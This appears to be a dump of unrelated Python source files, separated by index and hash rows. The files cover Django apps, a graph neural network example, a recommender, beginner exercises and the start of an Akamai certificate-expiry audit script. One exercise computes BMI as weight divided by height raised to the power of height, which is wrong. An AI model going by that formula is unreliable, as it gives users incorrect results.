polygon_id=polygon_problem.id,
)
prev_revision = local_problem.revision
local_problem.revision = polygon_problem.revision
local_problem.name = polygon_problem.name
local_problem.owner = polygon_problem.owner
local_problem.deleted = polygon_problem.deleted
local_problem.latest_package = polygon_problem.latest_package
if prev_revision is None or local_problem.revision > prev_revision:
self.update_problem_info(local_problem, polygon_problem)
local_problem.save()
def update_problem_info(self, local_problem, polygon_problem):
info = polygon_problem.info()
local_problem.input_file = info.input_file
local_problem.output_file = info.output_file
local_problem.interactive = info.interactive
local_problem.time_limit = info.time_limit
local_problem.memory_limit = info.memory_limit
local_problem.general_description = (
polygon_problem.general_description())
local_problem.general_tutorial = (
polygon_problem.general_tutorial())
polygon_tags = polygon_problem.tags()
self.create_missing_tags(polygon_tags)
local_problem.tags.set(polygon_tags)
def create_missing_tags(self, tags):
for tag in tags:
models.Tag.objects.get_or_create(tag=tag)
@transaction.atomic
def update_contest(self, contest_id, problem_set):
contest = (
models.Contest.objects
.filter(polygon_id=contest_id)
.first())
if contest is None:
contest = models.Contest(polygon_id=contest_id)
contest.save()
# Remove problems deleted from contest
(models.ProblemInContest.objects
.filter(contest_id=contest_id)
.exclude(problem_id__in=[problem.id
for problem in problem_set.values()])
.delete())
# Add/update problems which were added or re-ordered
for index, problem in problem_set.items():
models.ProblemInContest.objects.update_or_create(
contest_id=contest_id,
problem_id=problem.id,
defaults={'index': index},
)
|
11,082 | fe093191102e2fab3d8b2d461b7807208f33674f | """
This example implements the experiments on citation networks from the paper:
Semi-Supervised Classification with Graph Convolutional Networks (https://arxiv.org/abs/1609.02907)
Thomas N. Kipf, Max Welling
using the convolutional layers described in:
Convolutional Neural Networks on Graphs with Fast Localized Spectral Filtering (https://arxiv.org/abs/1606.09375)
Michaël Defferrard, Xavier Bresson, Pierre Vandergheynst
"""
import numpy as np
from tensorflow.keras.callbacks import EarlyStopping
from tensorflow.keras.layers import Dropout, Input
from tensorflow.keras.losses import CategoricalCrossentropy
from tensorflow.keras.models import Model
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.regularizers import l2
from spektral.data.loaders import SingleLoader
from spektral.datasets.citation import Citation
from spektral.layers import ChebConv
from spektral.transforms import LayerPreprocess
# Load data
dataset = Citation("cora", transforms=[LayerPreprocess(ChebConv)])
# We convert the binary masks to sample weights so that we can compute the
# average loss over the nodes (following original implementation by
# Kipf & Welling)
def mask_to_weights(mask):
return mask / np.count_nonzero(mask)
weights_tr, weights_va, weights_te = (
mask_to_weights(mask)
for mask in (dataset.mask_tr, dataset.mask_va, dataset.mask_te)
)
# Parameters
channels = 16 # Number of channels in the first layer
K = 2 # Max degree of the Chebyshev polynomials
dropout = 0.5 # Dropout rate for the features
l2_reg = 2.5e-4 # L2 regularization rate
learning_rate = 1e-2 # Learning rate
epochs = 200 # Number of training epochs
patience = 10 # Patience for early stopping
a_dtype = dataset[0].a.dtype # Only needed for TF 2.1
N = dataset.n_nodes # Number of nodes in the graph
F = dataset.n_node_features # Original size of node features
n_out = dataset.n_labels # Number of classes
# Model definition
x_in = Input(shape=(F,))
a_in = Input((N,), sparse=True, dtype=a_dtype)
do_1 = Dropout(dropout)(x_in)
gc_1 = ChebConv(
channels, K=K, activation="relu", kernel_regularizer=l2(l2_reg), use_bias=False
)([do_1, a_in])
do_2 = Dropout(dropout)(gc_1)
gc_2 = ChebConv(n_out, K=K, activation="softmax", use_bias=False)([do_2, a_in])
# Build model
model = Model(inputs=[x_in, a_in], outputs=gc_2)
optimizer = Adam(learning_rate=learning_rate)
model.compile(
optimizer=optimizer,
loss=CategoricalCrossentropy(reduction="sum"), # To compute mean
weighted_metrics=["acc"],
)
model.summary()
# Train model
loader_tr = SingleLoader(dataset, sample_weights=weights_tr)
loader_va = SingleLoader(dataset, sample_weights=weights_va)
model.fit(
loader_tr.load(),
steps_per_epoch=loader_tr.steps_per_epoch,
validation_data=loader_va.load(),
validation_steps=loader_va.steps_per_epoch,
epochs=epochs,
callbacks=[EarlyStopping(patience=patience, restore_best_weights=True)],
)
# Evaluate model
print("Evaluating model.")
loader_te = SingleLoader(dataset, sample_weights=weights_te)
eval_results = model.evaluate(loader_te.load(), steps=loader_te.steps_per_epoch)
print("Done.\n" "Test loss: {}\n" "Test accuracy: {}".format(*eval_results))
|
11,083 | 5a439040e3c8a04b0f05663539aa0f68ffa81404 | import pandas as pd
from abc import *
from tqdm.auto import tqdm
class AbstractRecommend(metaclass=ABCMeta):
def __init__(self):
pass
@abstractmethod
def recommend(self):
pass
def calculate_recommend(self, frame, before_recommend_count, cutoff_recommend_count):
limit_recommend = 100 - before_recommend_count
# 마지막 모델이거나 cutoff 제한이 없는 경우에는 100-recommend의 개수까지 추천합니다.
if self.last_model is True or self.cutoff_recommend_count is -1:
return frame['article_id'].values[:limit_recommend].tolist()
# 설정한 cutoff 보다 추천대상이 작으면 frame article_id를 그대로 return합니다.
recommend_count = min(limit_recommend, self.cutoff_recommend_count)
if frame.shape[0] < recommend_count:
return frame['article_id'].values.tolist()
# cutoff 보다 추천할 대상이 많으면 cutoff만큼 추천합니다.
return frame['article_id'].values[:recommend_count].tolist()
class RandomBestRecommend(AbstractRecommend):
def __init__(self, recommend_frame, cutoff_recommend_count):
self.recommend_frame = recommend_frame
self.cutoff_recommend_count = cutoff_recommend_count
self.last_model = False
def set_last_model(self):
self.last_model = True
def recommend(self, read_list, user_id, before_recommend_count):
frame = self.recommend_frame.query("article_id not in @read_list")
return super().calculate_recommend(frame, before_recommend_count, self.cutoff_recommend_count)
class BrunchRecommend(AbstractRecommend):
def __init__(self, user_list, read_frame, read_set=None):
self.user_list = user_list
self.read_dict = read_frame.groupby('user_id')['article_id'].apply(list).to_dict()
self.recommend_result = dict()
#self.recommend_mixed_result = dict()
self.all_read_set = set()
if read_set is not None:
self.all_read_set = read_set.copy()
def make_result_frame(self):
temp = pd.DataFrame.from_dict(self.recommend_result).T.reset_index()
return temp.rename(columns={'index':'user_id'})
def recommend(self, model_list=None):
try:
if not model_list:
raise Exception("model_list는 적어도 한 개 이상 있어야 합니다.")
model_list[-1].set_last_model()
self.recommend_result.clear()
#self.recommend_mixed_result.clear()
for user in tqdm(self.user_list):
self.recommend_result[user] = list()
#self.recommend_mixed_result[user] = list()
# read file에서 user가 이미 읽은 것을 제외합니다.
try:
already_user_read = self.read_dict[user]
except KeyError as e:
already_user_read = []
# model_list를 전달받으면 전달받은 model_list로 추천을 합니다.
for model in model_list:
# 각 모델마다 recommend를 수행합니다.
if isinstance(model, RandomBestRecommend) is True:
# print("RandomBestRecommend")
read_list = list(self.all_read_set) + already_user_read
r = model.recommend(read_list, user, len(self.recommend_result[user]))
# print(len(r))
else:
# user가 읽은 list와 이미 추천했던 결과를 합쳐서 model이 제외할 list를 만듭니다.
read_list = self.recommend_result[user].copy()
read_list = read_list + already_user_read
read_list = list(set(read_list))
r = model.recommend(read_list, user, len(self.recommend_result[user]))
# recommend
self.recommend_result[user] = self.recommend_result[user] + r
self.all_read_set = self.all_read_set.union(set(r))
#self.recommend_mixed_result[user].append(r)
except Exception as e:
print(e)
raise
def _ndcg(self):
pass
def _map(self):
pass
def _entropy_diversity(self):
pass
def evaluate(self):
pass
class TimebasedRecommend(AbstractRecommend):
def __init__(self, user_frame, timebased_frame, cutoff_recommend_count):
self.timebased_frame = timebased_frame
self.user_frame = user_frame
self.cutoff_recommend_count = cutoff_recommend_count
self.last_model = False
def set_last_model(self):
self.last_model = True
def recommend(self, read_list, user_id, before_recommend_count):
user_frame = self.user_frame.loc[self.user_frame['user_id']==user_id]
from_list = sorted(user_frame['from'].unique())
if len(from_list) == 0:
return list()
frame = self.timebased_frame.query("article_id not in @read_list")
frame_list = []
for t in from_list:
temp = frame.loc[frame['dt']==t].reset_index(drop=True)
temp['index'] = range(temp.shape[0])
frame_list.append(temp)
frame = pd.concat(frame_list)
frame = frame.sort_values(['index','count'], ascending=[True,False])
frame = frame.drop_duplicates('article_id', keep='first')
# 최대 recommend limit를 설정합니다.
return super().calculate_recommend(frame, before_recommend_count, self.cutoff_recommend_count)
class CutoffRecommend(AbstractRecommend):
"""
Cutoff를 가지는 recommend 모델입니다.
AbstractRecommend를 상속받는 모델은 recommend 함수를 구현해야 합니다.
recommend_frame: 각 추천 모델마다 필요한 전처리된 추천 frame입니다.
cutoff_recommend_count: 각 모델마다 cutoff값, -1로 설정하면 cutoff 제한이 없이 100 - 이전 모델 추천 개수 까지 추천합니다.
continous_read: True면 flag_sum을 가지는 연속형 추천 모델이고, False면 flag_sum을 가지지 않는 모델입니다.
기존 현우님 모델은 flag_sum_1,2,3,4,5 라고 되어있었는데 이것을 flag_sum이라는 컬럼에 1,2,3,4,5..n을 추가하는 형태로 변경합니다.
flag_sum은 반드시 높은 숫자가 좋아야 합니다.
"""
def __init__(self, recommend_frame, cutoff_recommend_count, userbased_model=True, continous_read=False, under_recommend=999):
self.recommend_frame = recommend_frame
self.cutoff_recommend_count = cutoff_recommend_count
self.continous_read = continous_read
self.userbased_model = userbased_model
self.last_model = False
self.under_recommend = under_recommend
def set_last_model(self):
self.last_model = True
def recommend(self, read_list, user_id, before_recommend_count):
"""
parameter
read_list: 이전 모델까지 추천한 article과 2/22 ~ 3/1일 까지의 읽은 article
user_id: user별로 추천하는 모델은 user_id를 넘겨줘야 합니다.
before_count: 이전 모델까지의 추천 개수
return
list형태의 article_id
"""
if self.under_recommend < before_recommend_count:
return list()
# 이전에 추천했던 article을 제거합니다.
#frame = self.recommend_frame.loc[~self.recommend_frame['article_id'].isin(read_list)]
# user_id를 사용하는 모델은 해당 user_id만 가져옵니다.
if self.userbased_model is True:
frame = self.recommend_frame.query("user_id == @user_id")
frame = frame.query("article_id not in @read_list")
else:
frame = self.recommend_frame.query("article_id not in @read_list")
# flag_sum이 포함된 모델, 연속 추천 모델
if self.continous_read is True:
# flag_sum은 높은것이 좋기 때문에 내림차순, count도 높은것이 좋기 때문에 내림차순
frame = frame.sort_values(by=['flag_sum', 'count','article_number'], ascending=[False, False, True])
return super().calculate_recommend(frame, before_recommend_count, self.cutoff_recommend_count)
|
11,084 | ab3678938de30d32401f44444ae5381121e5dcac | import re
"""
First Task
"""
# Initial Persons
persons_list = []
for index in range(1, 4):
print(f"Person number {index}:")
person = {
'name': input('Enter your name\n'),
'age': int(input('Enter your age\n'))
}
persons_list.append(person)
# 1)
for person in persons_list:
if person['age'] < 27:
person['name'] = 'Jimmy Hendrix'
print(persons_list)
# 2)
for person in persons_list:
if 't' in person['name'].lower():
person['age'] += 1
print(f"""Happy bday {person['name']}
Your are {person['age']} years old.""")
# 3)
counter = 0
while counter < persons_list[0]['age']:
if not counter % 2 == 0:
print(counter)
counter += 1
# 4)
e_letter = 'e'
for person in persons_list:
if e_letter in person['name'].lower():
lower_person = person['name'].lower()
if lower_person.startswith(e_letter):
print(f"{e_letter} in index 0")
elif lower_person[1] == e_letter:
print(f"{e_letter} in index 1")
else:
print(f"{e_letter} in index {person['name'].find(e_letter)}")
"""
Second Task
"""
# Initial Time
time = int(input('Enter time in minutes'))
# 1)
hours = int(time / 60)
minutes = time - (hours * 60)
print(f"hours: {hours}, minutes: {minutes}")
# 2)
if hours >= 1:
if hours < 2:
print("Ok...")
else:
print("Trilogy")
# 3)
if minutes > hours:
if minutes % 2 == 0:
hours *= 2
else:
minutes -= 1
else:
print(hours)
print(f"Hours: {hours}, Minutes: {minutes}")
"""
Third Task
"""
# Creating the file
file_content = """
My my candle candle burns at both ends;
It will not last the night;
But ah, my foes, and oh, my friends—
It gives a lovely light!
"""
file_path = "file.txt"
with open(file_path, mode='w') as my_file:
my_file.write(file_content)
# Reading the file
with open(file_path, mode='r') as my_file:
reading_content = my_file.read()
# 1)
all_words = reading_content.split()
# 2)
all_words_set = set({})
#
for word in all_words:
word = re.sub(r"[^A-Za-z]+", "", word)
all_words_set.add(word.lower())
# 3)
for word in all_words_set:
if word.startswith('t'):
print(f"Word ({word}) starts with 't'")
# 4)
for word in all_words_set:
if word.lower().startswith('a'):
print(f"Word: {word}")
print("Letters:")
for letter in word:
print(letter)
# 5) Short way
words_tuple = tuple(word for word in all_words if 'a' not in word.lower())
print(words_tuple)
# 5) Long way
to_be_tuple = []
for word in all_words:
if 'a' not in word.lower():
to_be_tuple.append(word)
to_be_tuple = tuple(to_be_tuple)
print(to_be_tuple)
# 6) Short way
new_e_words = [e_word.replace('e', '3') for e_word in all_words_set if 'e' in e_word]
print(new_e_words)
# 6) Long way
e_to_3 = []
for word in all_words_set:
if 'e' in word:
new_word = word.replace('e', '3')
e_to_3.append(new_word)
print(e_to_3)
|
11,085 | d55d4ca4f4ed3732620bcfa059ae85af6689b919 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import reverse, render, HttpResponseRedirect, get_object_or_404,HttpResponse
import json
from .models import Device, Log
import logging
from django.contrib import messages
logger = logging.getLogger('stable')
# Create your views here.
# 主页
def index(request):
if request.method == 'POST':
pass
else:
devices = Device.objects.all()
devices_in_loading = len(Device.objects.filter(status=u'待批准'))
return render(request, 'Stable/index.html', context={
'devices' : devices,
'devices_in_loading' : devices_in_loading,
})
# 未使用->待批准
def submit(request):
if request.is_ajax() and request.method == "POST":
ret = {'status':'', 'error':1, 'user':'', 'information':'','isAdmin':'','ip':'','expiration':''}
pk = request.POST.get("pk")
information = request.POST.get("content")
expiration = request.POST.get("expiration")
device = get_object_or_404(Device, pk=pk)
if device.status == '未使用':
ret['error'] = 0
device.information = information
device.expiration = expiration
device.user = request.user.nickname
device.status = '待批准'
device.save()
ret['user'] = device.user
ret['information'] = device.information
ret['expiration'] = device.expiration
ret['ip'] = device.ip
info = '{0}申请{1}点位成功,待管理员{2}批准\r'.format(request.user.nickname, device.location, device.admin)
logger.info(info)
Log.objects.create(handler=request.user.nickname, content=info)
else:
messages.warning(request, "操作失败,该点位已经被{0}申请使用".format(device.user))
return HttpResponseRedirect(reverse('Stable:index'))
ret['isAdmin'] = request.user.isAdminStable
ret['status'] = device.status
return HttpResponse(json.dumps(ret))
else:
return HttpResponseRedirect(reverse('Stable:index'))
# 待批准->使用中
def approve(request):
if request.is_ajax() and request.method == "POST":
pk = request.POST.get("pk")
ret = {'error':1, 'status':''}
device = get_object_or_404(Device, pk=pk)
if device.status == '待批准':
ret['error'] = 0
device.status = '使用中'
device.save()
info = '管理员{2}批准{0}的使用{1}点位申请\r'.format(device.user, device.location, request.user.nickname)
logger.info(info)
Log.objects.create(handler=request.user.nickname, content=info)
else:
messages.warning(request, "操作失败,该点位已经被批准或者用户取消了申请")
return HttpResponseRedirect(reverse('Stable:index'))
ret['status'] = device.status
return HttpResponse(json.dumps(ret))
else:
return HttpResponseRedirect(reverse('Stable:index'))
# 使用中->未使用 and 待批准->未使用
def delete(request):
if request.is_ajax() and request.method == "POST":
ret = {'error':1, 'status':'', 'isAdmin':'', 'ip':''}
pk = request.POST.get("pk")
device = get_object_or_404(Device, pk=pk)
if request.user.nickname == device.user or request.user.isAdminStable:
ret['error'] = 0
device.status = '未使用'
device.information = ''
device.user = ''
device.save()
info = '点位{0}由{1}重置为未使用状态\r'.format(device.location, request.user.nickname)
logger.info(info)
Log.objects.create(handler=request.user.nickname, content=info)
elif not device.user:
messages.warning(request, "操作失败,该点位已经处于未使用状态了")
return HttpResponseRedirect(reverse('Stable:index'))
else:
messages.warning(request, "操作失败,该点位已经被{0}申请使用".format(device.user))
return HttpResponseRedirect(reverse('Stable:index'))
ret['isAdmin'] = request.user.isAdminStable
ret['status'] = device.status
ret['ip'] = device.ip
return HttpResponse(json.dumps(ret))
else:
return HttpResponseRedirect(reverse('Stable:index'))
# 日志处理
def log(request):
logs = Log.objects.all()
return render(request, 'Stable/log.html', context={
'logs' : logs,
}) |
11,086 | a9b1302769e974f48fc6128b8579002440ad0408 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-05-22 13:08
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('seats', '0026_auto_20180510_1801'),
]
operations = [
migrations.AlterModelOptions(
name='log',
options={'get_latest_by': 'reg_datetime', 'ordering': ['-created_at']},
),
]
|
11,087 | a62f2877e6e702b13e237e67b2dda7ee52feb89c | # CodeUp #1116
a, b = map(int, input().split())
print('%d+%d=%d' %(a, b, a+b))
print('%d-%d=%d' %(a, b, a-b))
print('%d*%d=%d' %(a, b, a*b))
print('%d/%d=%d' %(a, b, a/b))
print('{}+{}={}'.format(a, b, a+b))
print('{2}-{1}={0}'.format(a-b, b, a))
print('{}*{}={}'.format(a, b, a*b))
print('{}/{}={}'.format(a, b, int(a/b))) |
11,088 | 36c6f865856bd5d3c25e84e9c04c8d2d24d72ac9 | # -*- coding: utf-8 -*-
from django.shortcuts import render
from django.http.response import HttpResponse
from .models import Candidate
# Create your views here.
def index(request):
candidates = Candidate.objects.all()
context = {'candidates':candidates}
return render(request,'elections/index.html', context)
def areas(request, area):
return HttpResponse(area) |
11,089 | 7d872eee093f2ba481356929c29a4aa924e314e1 | from decorator_include import decorator_include
from django.conf import settings
from django.conf.urls.i18n import i18n_patterns
from django.conf.urls.static import static
from django.contrib.auth import views as auth_views
from django.urls import include, path, re_path
from django.views import defaults
from django.views.generic import TemplateView
from django.views.generic.base import RedirectView
from django.views.i18n import JavaScriptCatalog
from social_core.utils import setting_name
from announcements import urls as announcements_urls
from checkin import urls as checkin_urls
from contentbox.views import ContentBoxDetailView, ContentBoxUpdateView
from dataporten.views import login_wrapper
from faq import urls as faq_urls
from groups import urls as groups_urls
from make_queue import urls as make_queue_urls
from make_queue.forms.reservation import ReservationListQueryForm
from makerspace import urls as makerspace_urls
from news import urls as news_urls
from users import urls as users_urls
from util.url_utils import ckeditor_uploader_urls, debug_toolbar_urls, logout_urls, permission_required_else_denied
from util.view_utils import RedirectViewWithStaticQuery
from . import views
extra = "/" if getattr(settings, setting_name('TRAILING_SLASH'), True) else ""
urlpatterns = [
path("robots.txt", TemplateView.as_view(template_name='web/robots.txt', content_type='text/plain')),
path(".well-known/security.txt", TemplateView.as_view(template_name='web/security.txt', content_type='text/plain')),
*debug_toolbar_urls(),
path("i18n/", include('django.conf.urls.i18n')),
*static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT), # For development only; Nginx is used in production
*ckeditor_uploader_urls(),
]
admin_urlpatterns = [
path("", views.AdminPanelView.as_view(), name='admin_panel'),
# App paths, sorted by app label (should have the same path prefixes as the ones in `urlpatterns` below):
path("announcements/", include(announcements_urls.adminpatterns)),
path("checkin/", include(checkin_urls.adminpatterns)),
path("faq/", include(faq_urls.adminpatterns)),
path("committees/", include(groups_urls.adminpatterns)),
path("reservation/", include(make_queue_urls.adminpatterns)),
path("makerspace/", include(makerspace_urls.adminpatterns)),
path("news/", include(news_urls.adminpatterns)),
]
admin_api_urlpatterns = [
# App paths, sorted by app label (should have the same path prefixes as the ones in `urlpatterns` below):
path("checkin/", include(checkin_urls.adminapipatterns)),
path("news/", include(news_urls.adminapipatterns)),
path("users/", include(users_urls.adminapipatterns)),
]
api_urlpatterns = [
# This internal permission is only used for base-level access control;
# each included path/view should implement its own supplementary access control
path("admin/", decorator_include(permission_required_else_denied('internal.is_internal'), admin_api_urlpatterns)),
# App paths, sorted by app label (should have the same path prefixes as the ones in `urlpatterns` below):
path("reservation/", include(make_queue_urls.apipatterns)),
]
content_box_urlpatterns = [
path("<int:pk>/change/", ContentBoxUpdateView.as_view(base_template='web/base.html'), name='content_box_update'),
]
about_urlpatterns = [
path("", views.AboutUsView.as_view(url_name='about'), name='about'),
ContentBoxDetailView.get_path('contact'),
]
urlpatterns += i18n_patterns(
path("", views.IndexPageView.as_view(), name='index_page'),
# This internal permission is only used for base-level access control;
# each included path/view should implement its own supplementary access control
path("admin/", decorator_include(permission_required_else_denied('internal.is_internal'), admin_urlpatterns)),
path("api/", include(api_urlpatterns)),
# App paths, sorted by app label:
path("announcements/", include('announcements.urls')),
path("checkin/", include('checkin.urls')),
path("faq/", include('faq.urls')),
path("committees/", include('groups.urls')),
path("reservation/", include('make_queue.urls')),
path("makerspace/", include('makerspace.urls')),
path("news/", include('news.urls')),
# ContentBox paths:
path("contentbox/", include(content_box_urlpatterns)),
path("about/", include(about_urlpatterns)),
*ContentBoxDetailView.get_multi_path('apply', 'søk', 'sok'),
ContentBoxDetailView.get_path('cookies'),
ContentBoxDetailView.get_path('privacypolicy'),
# This path must be wrapped by `i18n_patterns()`
# (see https://docs.djangoproject.com/en/stable/topics/i18n/translation/#django.views.i18n.JavaScriptCatalog)
path("jsi18n/", JavaScriptCatalog.as_view(), name='javascript_catalog'),
prefix_default_language=False,
)
# Configure login based on if we have configured Dataporten or not.
if settings.USES_DATAPORTEN_AUTH:
urlpatterns += i18n_patterns(
path("login/", RedirectView.as_view(url="/login/dataporten/", query_string=True), name='login'),
# This line must come before including `social_django.urls` below, to override social_django's `complete` view
re_path(rf"^complete/(?P<backend>[^/]+){extra}$", login_wrapper),
path("", include('social_django.urls', namespace='social')),
prefix_default_language=False,
)
else:
# If it is not configured, we would like to have a simple login page. So that
# we can test with non-superusers without giving them access to the admin page.
urlpatterns += i18n_patterns(
path("login/", auth_views.LoginView.as_view(
template_name='web/login.html',
redirect_authenticated_user=True,
# This allows the `next` query parameter (used when logging in) to redirect to pages on all the subdomains
success_url_allowed_hosts=set(settings.ALLOWED_REDIRECT_HOSTS),
), name='login'),
prefix_default_language=False,
)
urlpatterns += logout_urls()
Owner = ReservationListQueryForm.Owner
# --- Old URLs ---
# URLs kept for "backward-compatibility" after paths were changed, so that users are simply redirected to the new URLs.
# These need only be URLs for pages that are likely to have been linked to, and that are deemed important to keep working.
urlpatterns += i18n_patterns(
path("rules/", RedirectView.as_view(pattern_name='rules', permanent=True)),
path("reservation/", RedirectView.as_view(pattern_name='machine_list', permanent=True)),
path("reservation/<int:year>/<int:week>/<int:pk>/",
RedirectView.as_view(url='/reservation/machines/%(pk)s/?calendar_year=%(year)s&calendar_week=%(week)s', permanent=True)),
path("reservation/me/", RedirectViewWithStaticQuery.as_view(pattern_name='reservation_list', query={'owner': Owner.ME}, permanent=True)),
path("reservation/admin/", RedirectViewWithStaticQuery.as_view(pattern_name='reservation_list', query={'owner': Owner.MAKE}, permanent=True)),
path("reservation/slots/", RedirectView.as_view(pattern_name='reservation_find_free_slots', permanent=True)),
path("reservation/rules/<int:pk>/", RedirectView.as_view(pattern_name='reservation_rule_list', permanent=True)),
path("reservation/machinetypes/<int:pk>/rules/", RedirectView.as_view(pattern_name='reservation_rule_list', permanent=True)),
path("reservation/rules/usage/<int:pk>/", RedirectView.as_view(pattern_name='machine_usage_rule_detail', permanent=True)),
path("reservation/machinetypes/<int:pk>/rules/usage/", RedirectView.as_view(pattern_name='machine_usage_rule_detail', permanent=True)),
path("news/article/<int:pk>/", RedirectView.as_view(pattern_name='article_detail', permanent=True)),
path("news/event/<int:pk>/", RedirectView.as_view(pattern_name='event_detail', permanent=True)),
path("news/ticket/<uuid:pk>/", RedirectView.as_view(pattern_name='event_ticket_detail', permanent=True)),
path("news/ticket/me/", RedirectView.as_view(pattern_name='event_ticket_my_list', permanent=True)),
prefix_default_language=False,
)
# These handlers are automatically registered by Django
# (see https://docs.djangoproject.com/en/stable/topics/http/views/#customizing-error-views)
def handler404(request, exception):
return defaults.page_not_found(request, exception=exception, template_name='web/404.html')
def handler500(request):
return defaults.server_error(request, template_name='web/500.html')
|
11,090 | 86b4616bd8ba70f65b542cf7c7101188a189c78f | class Solution:
def concatenatedBinary(self, n: int) -> int:
binString = ""
for i in range(n + 1):
binString = binString + "{0:b}".format(i)
return int(binString, 2) % 1000000007
|
11,091 | 323360bc3cce94146c0cb84be0a1b8c8205a308a | from django.conf.urls import url
from django.urls import path
from Blogs import views
urlpatterns = [
path('blog_posts.html', views.blog_posts, name='blog_posts'),
path('blog_form.html', views.blog_post_form, name='blog_post_form'),
] |
11,092 | fd9f1180c8f16f9b280f7a539a6d734926645ab2 | ########################
# Author: ~wy
# Date: 25/12/2017
# Description: Represents one of the 6 Guesses in the game
########################
class Guess:
def __init__(self, choices):
self.choices = choices
def get_choices(self):
return self.choices
def __str__(self):
return "[{}]".format(self.choices)
|
11,093 | 0b97bad2fc0adf54957ed3cbb269590a3e8dde04 | height=input("Please enter your height in meter")
weight=input("please enter your weight in kg")
f_height=float(height)
f_weight=float(weight)
print(f_weight/(f_height**f_height)) |
11,094 | 28923379dc03a7742df5c0604c23abbd9c3b025f | import OpenSSL , ssl, argparse ,json, os.path, validators, requests, logging
from datetime import datetime
from dateutil.parser import parse
from urllib.parse import urljoin
from akamai.edgegrid import EdgeGridAuth, EdgeRc
from pathlib import Path
#TODO: FIX logger format
#turn off logger
#send ouput to tmp file
#improve help documentation
parser = argparse.ArgumentParser(description='Certificate Expiration Audit\nLatest version and documentation can be found here:\nhttps://github.com/roymartinezblanco/Akamai-SSL-Expiration-Audit',formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('--version', help='Show script version information',
required=False, action='store_true')
parser.add_argument('--audit', type=str, choices=['account','config','file','list'], help='*required* Type of Audit to be done: [account,config,file,list]',
required=False)
parser.add_argument('--domains', nargs='+', type=str, help='List of domains to query.',
required=False)
parser.add_argument('--file-type', type=str, choices=['list','akamai'], help='File Type (list, akamai)',
required=False, default='akamai')
parser.add_argument('--file', type=str, help='File with list of domains (one per line)',
required=False)
parser.add_argument('--config-name',nargs='+', type=str, help='Name or List of Names to be audited.)',
required=False)
parser.add_argument('--verbose', help='Show debug information',
required=False, action='store_true')
parser.add_argument('--section', type=str, help='Select a Edgerc section other than the Default',
required=False)
parser.add_argument('--account-key', type=str, help='Account ID to Query for multi account management (switch key)',
required=False)
args = vars(parser.parse_args())
### Global Variables
version= "1.0.30"
errors = []
items = {}
item_list= []
logger = logging.getLogger("SSL-AUDIT")
def configure_logging():
logger.setLevel(logging.DEBUG)
# Format for our loglines
formatter = logging.Formatter("[%(asctime)s] - %(name)s - %(levelname)s - %(message)s")
# Setup console logging
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
ch.setFormatter(formatter)
logger.addHandler(ch)
# Setup file logging as well
# fh = logging.FileHandler(LOG_FILENAME)
# fh.setLevel(logging.INFO)
# fh.setFormatter(formatter)
# logger.addHandler(fh)
def readObject(File,Ftype:str,configName:str=None):
origins=[]
if Ftype != "API":
if os.path.exists(File):
if Ftype == "list":
if args['verbose']:
#print("...... Reading file '{}'.".format(File))
logger.debug("Reading file '{}'.".format(File))
lines = [line.rstrip('\n') for line in open(File)]
getCertificates(lines)
else:
try:
with open(File) as handle:
dictdump = json.loads(handle.read())
except:
parser.error("Unable to Parse JSON File, please validate format.")
else:
findOrigins(dictdump,origins,configName)
getCertificates(origins,configName)
else:
parser.error("The File {} does not exist!".format(File))
else:
if args['verbose']:
logger.debug("Reading rules for the property '{}' .".format(configName))
findOrigins(File,origins,configName)
getCertificates(origins,configName)
def findOrigins(obj,origins:list,configName:str=None):
for ok, ov in obj.items():
if ok == "name" and ov == "origin":
options = dict(obj["options"])
if options["originType"] == "CUSTOMER":
if args['verbose']:
logger.debug("Origin behavior found with the value '{}' on the configuration '{}'.".format(dict(obj["options"])["hostname"],configName))
origins.append (dict(obj["options"])["hostname"])
for k, v in obj.items():
if isinstance(v,dict) or isinstance(v,list):
if "values" not in k.lower():
if isinstance(v,list):
if len(v) > 0:
for i in v:
if isinstance(i, dict):
findOrigins(dict(i),origins,configName)
else:
findOrigins(v,origins,configName)
def printJson():
if args['verbose']:
logger.debug("Printing JSON.")
logger.debug("[end]")
if len(item_list) == 0:
logger.error("No output generated to print!")
return None
if item_list[0] != {}:
items['items'] = item_list
if args['audit'] == "list":
if len(errors) != 0:
items['errors'] = errors
formatted_json = json.dumps(items, sort_keys=False, indent=4)
print(formatted_json)
def getCertificates(domains: list,configName:str=None):
currentConfig={}
if args['audit'] != "list" and args['audit'] != "file":
currentConfig['propertyName'] = configName
certs=[]
er=[]
for host in domains:
if args['verbose']:
logger.debug("Looking up the certificate for '{}' ".format(host))
if "{{" in host:
if args['verbose']:
logger.warning("'{}' is a variable and will not be looked up!".format(host))
er.append("'{}' is a variable and will not be looked up!".format(host))
else:
if validators.domain(host) != True:
if args['verbose']:
if configName is not None:
logger.warning("'{}' is not a valid domain, on the configuration'{}'!".format(host,configName))
else:
logger.warning("'{}' is not a valid domain!".format(host))
er.append("'{}' is not a valid domain!".format(host))
continue
try:
hostname = host
port = 443
conn = ssl.create_connection((hostname,port), timeout=10)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sock = context.wrap_socket(conn, server_hostname=hostname)
certificate = ssl.DER_cert_to_PEM_cert(sock.getpeercert(True))
x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM,certificate)
except BaseException as e:
if args['verbose']:
logger.error("Can't connect to '{}' error: {}".format(host,str(e)))
er.append("Can't connect to '{}' error: {}".format(host,str(e)))
else:
serial= '{0:x}'.format(x509.get_serial_number())
exp_date = str(x509.get_notAfter().decode('utf-8'))
dt = parse(exp_date)
daystoexp=dt.replace(tzinfo=None)-datetime.utcnow()
item = {}
item['Domain'] = str(host)
item['Serial'] = str(serial)
item['ExpDate'] = str(dt.date())
item['DaysLeft'] = daystoexp.days
certs.append(item)
if domains == []:
if configName is not None:
er.append("No customer origins found on the configuration '{}'.".format(configName))
if args['verbose']:
logger.warning("No customer origins found on the configuration '{}.".format(configName))
else:
er.append("No customer origins found.")
if args['verbose']:
logger.warning("No customer origins found.")
if certs != []:
currentConfig['certificates'] = certs
if er != []:
if args['audit'] != "list":
currentConfig['errors'] = er
else:
errors.append(er)
item_list.append(currentConfig)
return
def propertyManagerAPI(action:str,config:str=None,p:list=None):
try:
home = str(Path.home())
